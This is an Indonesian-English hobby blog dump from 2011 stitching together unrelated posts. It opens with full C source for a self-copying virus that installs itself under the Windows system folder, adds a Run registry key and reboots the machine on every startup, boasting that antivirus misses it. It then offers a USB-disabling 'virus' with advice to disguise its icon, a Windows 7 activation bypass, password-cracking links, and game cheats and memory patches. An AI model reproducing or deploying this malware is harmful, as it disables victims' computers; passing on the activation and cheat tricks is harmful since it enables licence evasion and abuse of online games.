Minggu, 20 Februari 2011

download DELPHI and C++

download delphi here

download C++ here

A Virus Program to Restart the Computer at Every Startup




Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.


#include
#include
#include
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}





Virus Program to Disable USB Ports

A Virus Program to Disable USB Ports


Virus to disable USB portsIn this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

How to Use Windows 7 Without Activation



Windows 7Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.
1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.
2. Now type the following command and hit enter
slmgr -rearm
3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.
4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1.
6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.

10 Best Simulation Games for PCs

Simulation games are those where you play it as if you are undergoing that situation in your real life. Most of these games are used for training purposes so that the people get familiar to the various situations. Here are the 10 best simulation games for PCs that are more adventurous to grasp everyone’s interest and craze for games with adventure.
flight simulation game
Microsoft Space Flight Simulator manages with 14 special real world space craft (real-world vehicles) on space shuttle, interplanetary vessels and other fictional machines running along the live stations (Mir and Ring station1) resting and take-off from Kennedy space center, mars base futuristic space. It comprises of 1994 standards which is not attuned with Microsoft window’s up to date versions.
Orbiter released in November 2000, a freeware Application by Dr.Schweiger involve live vehicles (space shuttles, Delta Glider, etc) with easy interface with multi-functional display units with the 3D cockpits. Orbiter Sound on installation can provide audio effect as the application lacks the audio component.
Combat Flight Simulator has got some small variations in game engines compared to other versions. Modern WW-II flight games graphics are advanced 3D-model that is ground breaking graphic engine designed in particular for high definition.
IL-2 Sturmovik with its stunning graphics and AI intelligent effect has include a clear training mode that offers short missions on controls as they are a bit difficult. It requires a powerful PC with graphical stuff for good performance of the application.
Air Traffic control Simulator brings you a game on learning the perfect professionalism of air traffic control with good quality graphic interface and voice recognization via Microsoft speech API. Real radarscope with switches and its functions add up a realistic effect of airport.
Independence War 2, realistic physics stuff has a quite complex game play yet simple to learn. Highlight of the game is the top-notch graphics and the sound effect wit intuitive interface for knowledgeable gamers. Multitude of functions with sequel to fight for independence with command over 4 flyable ships and weapons has made a great debut.
Microsoft Train Simulator has its own routes including activities with dazzling graphic effects and tutorials to guide along. It also experiences some drawbacks as it needs 1.8GB hard disk with a superior graphic card to keep up the game effective.
Roller Coaster Tycoon Gold Edition by Chris Sawyer shows the adventure in amusement park with its excellent 3G graphic workouts over the coaster ride and delicate detail over experience with a good animation effect with a new theme park.
Blazing Angels 2: Secret Missions is one of the well known highly rated game for its valuable graphic effect and high player progression with its denigration over controls and console iterations. Different perspective with elite pilot in the secret team with the most dangerous mission of adventure is the added feature.
Wings of Power hold an exciting 3D graphic with authentic flight simulation with Microsoft flight simulator add-ons including a special edition of prints with 17×14 inch checklist on every aircrafts on pilot’s manual.

Top 10 Best Free Spyware Removal Softwares

1. Lavasoft As-Ware Anniversary Edition
Lavasoft is known for being excellent in spyware removal but it is not that famous at preventing infection. So if you are just in search of a great Removal Software, this could be it.
2. Spyware Sweeper
This software offers constant monitoring that impedes spyware before it hits. It comes with superior detection and removal means and auto-updates for adamant spyware.
3. Ad-Aware Anti Malware 8.1.3
The creators of this software were one of the pioneers in anti malware. This software completes entire scans pretty fast and presents thorough screen info on what the software is hunting for and what it has found.
4. Malware Bytes
This one is a comparatively quick malware solution with its swift scan just taking a short amount of time, even while other heavy applications are running.
5. iObit Security 360
This utility spots and eradicates the deepest attacks, and offers protection from various types of viruses, spyware and other malware.
6. Spybot Search and Destroy
Known for quality, this software gives you a feature to review apps being loaded when the computer starts. I rate this one very highly!
7. Trend Micro Hijack This
This one generates a comprehensive file and registry settings report. There is no disjointing in scan results between unsafe and safe settings, so you can get rid of the items selectively.
8. Norton 360
Famous for its comprehensive performance and security solution, this Antivirus software is easy to install even for a beginner PC user.
9. Windows Defender
A solution for severely infected computers, this software is also known for not giving false alarms during scans. Is shipped along with Windows in most versions.
10. Spyware Doctor 2010
Spyware doctor presents an excellent assortment of malware defense tools, but its notoriously strict trial restrictions makes it hard to evaluate. Even then, it is still preferred by many for its higher performance.

Decrypt MD5 Hash


MD5 Password Recovery
Enter the hashed string and click the “Do IT” button, you get the original Key-phrase Password.
MD5Crack
This will help you generate as well as Decrypt the MD5 hashed strings. It has a Google like interface.
GData
Allows you to enter a maximum of 5 MD5 hashed string at the same time, separated by semicolon and gives out the original words.
MD5 Decoder
This also helps in decoding the HEX coded strings which are of 32 characters.
MD5Cracker
Helps to decode as well as encode an MD5 hash.
Reverse MD5 hash
Has a Google-like look and is powered by rednoize.com. Using SHA1 is also possible with this tool.
MD5 Decrypter
Helps to Decrypt a maximum of 8 hashes at the same time. CAPTCHA is used to avoid use by spammers.
Reverse MD5 lookup
Decrypts Hash to Clear text as well as Encrypts any String into MD5 hash.
MD5 hash Database
Searches about 5 databases for the Hash, if the Clear text is found in any of those then the appropriate result is shown.
X MD5
A Chinese Search engine to decrypt MD5 hashes online.

Sabtu, 19 Februari 2011

crossfire

SEAL Online Game Download


Sistem Komputer Yang Diperlukan

Kalau sistem komputer yang dibutuhkan tidak memenuhi standar, game tidak akan bisa beroperasi secara baik. Kami merekomendasikan sistem komputer kamu untuk memenuhi standar yang dibutuhkan untuk bisa bermain game secara leluasa.
 Persyaratan MinimumPersyaratan Yang Direkomendasikan
OSWindows 98/ME/NT/2000/XPWindows 98/ME/NT/2000/XP
CPUPIII 600 MHzP4 2.4 Ghz / Athlon 64 2600 Mhz
RAM256 MB512 MB
VGA32 MB VGA + 3D Support64 MB VGA + 3D Support
HDD2 GB4 GB atau lebih
Sound 16 bit Sound Card
Internet56 kbps ModemCable Modem

SEAL Online Indonesia Client Download v.208

Kamu membutuhkan (minimal) DirectX 9 untuk bisa bermain SEAL Online Indonesia.
Download DirectX 9 di paling bawah halaman ini.
Full DownloadSize: 682 MB
atau

Perhatian!
Download SEAL Online Indonesia Client v.208 dalam bentuk .RAR (File terpisah) agar lebih cepat.
Size Part 1-28 : 23.8 MB
Size Part 29    : 12.3 MB
Petunjuk instalasi Seal Online :
  • Download semua file untuk instalasi Seal Online (SEALOnlineIDNv208.sfx.part01.exe - SEALOnlineIDNv208.sfx.part29.rar) dan letakkan file hasil download tersebut dalam 1 folder yang sama.
  • Klik 2x pada file SEALOnlineIDNv208.sfx.part01.exe, dan lakukan proses ekstrak untuk mendapatkan file Seal Online.
  • Setelah proses ekstrak selesai, jalankan file SEALOnlineIDN.exe.

DirectX 9 Download

Kamu membutuhkan DirectX 9 untuk bisa bermain SEAL Online Indonesia.

POINTBLANK

Full Client Download

Download dan install client Point Blank untuk memainkan Point Blank.

Gemscool menyediakan layanan download untuk client Point Blank. Tersedia pula website mirror yang dapat dipilih untuk alternatif download.

(Semua client disediakan oleh Gemscool. Pilih situs favoritmu untuk mendownload client) 
 

Pay Per Click

Nih......

Aku cuma mau share aja bagi yang mau dape dollar gratis......

daftar disini .............

















wallhack

link download ada di siiniii

Minggu, 13 Februari 2011

Spesial Buat GB

Download

Redox


[*] F10: alt tab on


[*] UP (Tanda Panah atas ):MAP HACK ON
[*} DOWN (Tanda Panah Bawah):MAP HACK OF



[-] HOME :HACK CARD mison valentine bisa dipake buat masmed
[-] END:RESET:CARD reset mison valentine bisa dipake buat masmed


Download

Sabtu, 05 Februari 2011

Panda Antivirus Pro 2011


Panda Antivirus Pro 2011 Panda Antivirus Pro 2009


Install it and forget about viruses, spyware and hackers.
More than a simple Antivirus! The new Panda Antivirus Pro 2011 offers the easiest and most intuitive protection for your computer. Install it and forget about viruses, spyware, root kits, hackers and online fraud. Chat, share photos and videos, do online shopping and banking, read your favorite blogs or browse the web with total peace of mind and without interruptions. Thanks to the Collective Intelligence technology, this product is safer, faster and more complete than ever.
Install Panda Antivirus Pro 2011 and forget about viruses, spyware and hackers.

Key features:
  • Antivirus
  • Firewall
  • New! Multimedia/Gaming Mode
  • New! Home Network Manager
  • Plus! Safe Browser (Sandboxing)

Kaspersky Anti-Virus Update

download aja disini

PC Media Valhalla Beta



  • LinkProtector. Merupakan salah satu fitur utama terbaru yang dapat memberi perlindungan pengguna saat berinternet.  Fitur LinkProtector ini mampu mencegat website berbahaya yang memiliki potensi menyebarkan malware hingga tindakan phising. Dengan kumpulan database yang dapat di-update, keamanan dalam berinternet pun dapat terjaga.
  • Anti-Keystroke. Salah satu ancaman dari malware yang popular saat ini yaitu pencurian data. Fitur terbaru Anti-Keystroke akan mencegat secara real-time perekaman tekanan tombol keyboard yang dilakukan oleh sebagian besar program keylogger yang banyak beredar saat ini.
  • Extension Manager. Beberapa extension yang terdapat pada Valhalla Beta dapat digunakan sebagai program bantuan dalam menganalisa system seperti Task Manager, Process Monitor, dan Locked Handles Viewer. Ke depan, SDK Extension Manager akan dipublikasikan sehingga pihak ketiga dapat pula ikut terlibat dalam membuat extension tambahan, namun keamanannya tetap terjaga.
  • Lock Settings. Proteksi password terhadap konfigurasi yang ditetapkan pengguna agar secara umum setting/konfigurasi Valhalla tidak dapat diubah atau dipaksa exit, khususnya oleh malware.
Downl0ad: here
Passw0rd: valhalla

ProcNetMonitor

About ProcNetMonitor

ProcNetMonitor is the FREE tool to monitor the network activity of all running process in the system. It displays all open network ports (TCP/UDP) and active network connections for each process. It has advanced color based auto analysis system to make it easy to distinguish network oriented processes from others with just one glance at the list.
It also presents unique 'Port Finder' feature to easily search for particular port in all running processes with just one click. It also comes with export feature to save the entire process-port list to standard HTML file for offline analysis.

All these features combined together make it very effective tool in combating the Trojans and Spywares installed on the system which continuously send keyboard strokes, online account data and other sensitive information to remote server.
Current version comes with Installer to allow you to install it locally. It also includes new version detector which reminds you whenever newer version is available.

ProcNetMonitor works on all Windows platforms starting from XP to latest Windows 7 version.



Features of ProcNetMonitor
Here is the highlight of ProcNetMonitor's features.

* Informative running process list with TCP/UDP/connection count displayed per process.

* Unique 'Port Finder' feature to search for network port in all running processes.

* Advanced color based auto analysis system makes it easy to separate out network based process from
others with just one glance.

* AutoRefresh feature to automatically update the process network parameters on selection.

* Faster remote host name resolution using multi thread based approach.

* Display open network ports (TCP/UDP) and active network connections for selected process.

* Sort the process list based on various parameters such as process name, process id, TCP count, UDP count, connection count etc.

* Shows detailed properties of process on double click.

* Option to terminate the selected process.

* Export feature to save the entire displayed list to standard HTML file for offline analysis.

* Refresh option to manually refresh the process and network port/connections list.

Using ProcNetMonitor

PProcNetMonitor is easy and simple to use with its interactive GUI interface. You can copy the executable file to any folder and run it directly. Here is more information about its usage...
  • On Launching ProcNetMonitor, it will display only network oriented processes. If you wish to see all running processes then you can uncheck 'show only network oriented processes' check box at the top right corner.
  •  Now you can click on any process to view its open TCP/UDP ports & active network connections.
  • To search for certain port such as 80, you can just enter it in the search box and click on search button.
  • This will show all running processes having port 80 open or remote connectection to port 80. You can leave search box empty to view all running processes. 
  • To view more details about the process, you can simply double click on any process or click on 'Properties' button.
  • Use the 'Refresh' button to reload the process-port list.
  • Finally you can save the displayed process-list to standard HTML file for later analysis using the 'Export' button.

NetShareMonitor

NetShareMonitor is the application to watch your shared files from the intruders and thereby protecting your shares from unauthorized access. As soon as remote user connects to your machine, NetShareMonitor detects it and displays information about that session. The session information includes remote host address, remote user name, list of accessed files and time of connection. Entire details pertaining to each session will be logged to file for future analysis.

Now you no longer have to worry about your shared files being accessed by unknown persons on the network. You can make NetShareMonitor to keep eye on your shares while you get down to work. It will alert you on any file access and you can always check the log files for past sessions in case you have missed the alert.
 
 
NetShareMonitor in Action

 
NetShareMonitor
 
 
Usage of NetShareMonitor
 
  • Watch against unauthorized access to the shared files
    • You can keep eye on all shared files without getting distracted from your normal work. The remote host address and user name will help you to quickly track down the malicious user.

  • Protect your system against network worms
    • Most of the viruses spread by exploiting shared folders on the network. NetShareMonitor helps you to detect any such attempts and also reduces the response time considerably to eliminate the virus infected machines from the network completely.
 
 
Features of NetShareMonitor

 
1. Alert on Remote Connection
As soon as the remote user connects to your machine, alert will be generated by playing the music and the NetShareMonitor icon in system tray starts blinking to draw your attention.
 
2. Null Session Detection
Null connection is the first step taken by the hackers to get information about your system. When you see the session without username that is generally due to "Null connection" . NetShareMonitor will help you to detect any such intruder trying to penetrate your system.
 
3. Full Session Information
NetShareMonitor provides you with full session information including the remote hostname and the username which will help you to track down the intruder quickly. It shows time details such as "Start Time" and "Active time" gives idea about when the remote session was started and how long the session was active. Shared file access list gives details about the files that have been accessed during that particular session.
 
4. User Friendliness
This application is very easy to use and customize. No special installation is required; you have to just click on it to launch the application. On minimize it will hide and sit in the system tray, silently watching your shared files from intruders. You can easily customize various options through settings dialog.
 
 
 
How to use NetShareMonitor

Launch this application and then minimize to make it sit in system tray. Now try to access shares on your system from remote host. Instantly NetShareMonitor will play music and starts blinking indicating an attempt to access your shares. Now double click on system tray icon to see details about current session and accessed files.

Download

FacebookPasswordDecryptor 1.5


Facebook Account Password Recovery Software

Size: 2.0 MB
License: Freeware
Download Count: 98782
Platform: Windows XP, 2K3, Vista, Longhorn, Win7
MD5 Hash: 4e93fff30a4ac7bfb06a489f3ece1824
PAD File: facebookpassworddecryptor_padfile.xml

Jumat, 04 Februari 2011

Need Writer...

Dicari Seseorang yang Memiliki Skill Programing DELPHI

Akan Dijadikan sebagai Penulis : Http://dex-trinity.co.cc
  • Dex-Trinity







  • Call me / Sms : 083197768216

    NB . Cantumkan nama beserta alamat

    Cheat 1 hit kill

    Cheat 1 hit kill

    * Buka Ninja Saga jangan di mulai
    * Buka CE 6.0 lalu klik open process
    * Lalu ganti tipenya dengan Array of bytes dan centang Hex dan Asrom (Also Scan-read only)
    * Scan kode ini : 62 04 D3 24 64 A3 A2
    * Setelah itu akan keluar 2 adress taruh bawah semua ganti salah satu adress dengan : 62 04 D3 24 64 A2 A2
    * Setelah itu klik play dan test dengan jurus


    Dan jangan lupa cheat ini hanya bisa di pakai pada jurus elemen dasar yang anda pilih

    Cheat HP (Health Point) =

    *.Buka Ninja Saga, INGAT JANGAN KLIK PLAY DULU!!!!


    *.Buka Cheat Engine, klik icon komputer pada sebelah kiri atas


    *.pilih plugin-container.exe


    *.klik open
     

    *.Pada "Value type" pilih Array of Bytes, dan centang "Also scan read-only memory"
     

    *.Kemudian pada value tulis 28 00 00 00 26 02 00 00 03 00 , kemudian pilih First Scan
     

    *.Setelah ketemu addressnya double address tersebut sehingga address tersebut akan muncul 
    pada kolom dibagian bawah Cheat Engine.
     

    *.ganti Value pada address tersebut menjadi AA FF FF 00 26 02 00 00 03 00
     

    *.Klik Play pada Ninja Saga.
     

    *.Lets play......

    new update

    [*] F10: alt tab on


    [*] UP (Tanda Panah atas ):MAP HACK ON
    [*} DOWN (Tanda Panah Bawah):MAP HACK OF

    [*} F1 : HACK RANK
    [*] F10:SPION MODE

    [-]
    [-] F4 : hack senjatah spas (semi senjatah permanen)

    [-] F5 : hack senjatah kriss (semi senjatah permanen)

    [-] F2 HACK TITLE

    [-] NUMPAD 1 : BARET BUSTER
    [-] NUMPAD 2 : STIL ASSASIN

    [-] NUMPAD 3 : Shooting Stars
    [-] NUMPAD 4 : Nibble Snaker

    [-] NUMPAD 5 : GM

    [-] F6 : White Mask
    [-] F7 : Black Mask
    [-] F8 : Hospital Mask
    [-] F9 : Kotiki Mask
    [-] NUMPAD6 : SKULLMASK
    [-] NUMPAD7 : JOKERMASK
    [-] NUMPAD8 : GOLDENMASK
    [-] NUMPAD9 : Haloowen MASK
    [-] NUMPAD0 : IRON MASK

    [-] HOME :HACK CARD
    [-] END:RESET:CARD


    [F12] exit game


    ==================
    Cara Pakai
    ==================

    [~]Minimize
    Tekan F10 On

    [~]Hack senjatah (senjatah semi permanen) :
    - masuk dalam room tekan hotkey F4/F5 mauk inventory tarah senjatah beubah ajib nb harus ada senjatah kriss /spas yg no use

    [~]Cara Pkai Beret:
    -Tekan Numpad 1 lalu Play

    [~]Spion Tekan f10 Untuk View All ,



    [~]Masmed
    harus adah point: Hack Masmed onLy Pastikan anda tidak punya Misi apapun,
    lalu bayangkan anda sedang membeli Misi termurah
    Setelah itu tanpa sadar anda menekan tombol Home
    dan tangan anda mulai memainkan mOuse tuk Mengkilik Tombol Mision (ada disebelah tombol inventory)
    lalu mengklik Card O, lalu mengklik lagi Tombol mision tersebut (ada disebelah tombol inventory), begitu seterusnya sampai huruf K yg terakhir, setelah itu jgn klik huruf P yg pertama, lgsg DC aja., abis itu masuk lg, baru deh huruf P nya gk nyala, dan menyelesaikan misi yang tersisa setelah selesai bermain anda akan tersadar bahwa anda telah mendapatkan 1 Masmed dan 1 ensign atau 1 medal (Obsesi sang Hypnotis,
    jangan jadi ajank junk,dan oot nda usah dibahas . Hhehhe)

    home : Hack Exp card dan Hack ensign/Medal Kalo mau exp gede ya beli msi major toh mas, okay ?
    kalo mau ensignnya ajah atau medalnya cari yang murah,
    beli Misi lalu anda Gb beneran thu misi secara nyata dari Huruf P sampe N (ingat sampe N bukan K) l
    alu klik tab mision dan letakkan misi dihuruf P lalu tekan END lalu lanjutkan Gb dengan keluar masuk ajah thu tumbal nda usah selesaikan misi lagi lemayan dapet exp kalo misi major 1 menit
    bisa 1500exp (karena 1 menit bisa 3xplay) ensign atau medal dapet tiap play 1

    [~]MapHack/BUG
    ~Tekan Arah panah atas ....
    ~Pilih Room yang bukan nama aslinya
    ~aktifkan map hack dgn tekan arah panah atas trsu star klu udah star ntar ada loading hiam disinih harus kecepatan tangan harus di ofin di loading hitam
    [~]Cara Pkai Beret:
    -Tekan Numpad 1 lalu Play

    [~]Spion Tekan f10 Untuk View All ,

    Cheat Recruit Friend lvl 100 Di Shop

    -Fiddler
    -Filenya Swfnya
    filenya download >>>DISINI<<<
    fiddler download >>>DISINI<<<
    drag filenya ke fiddler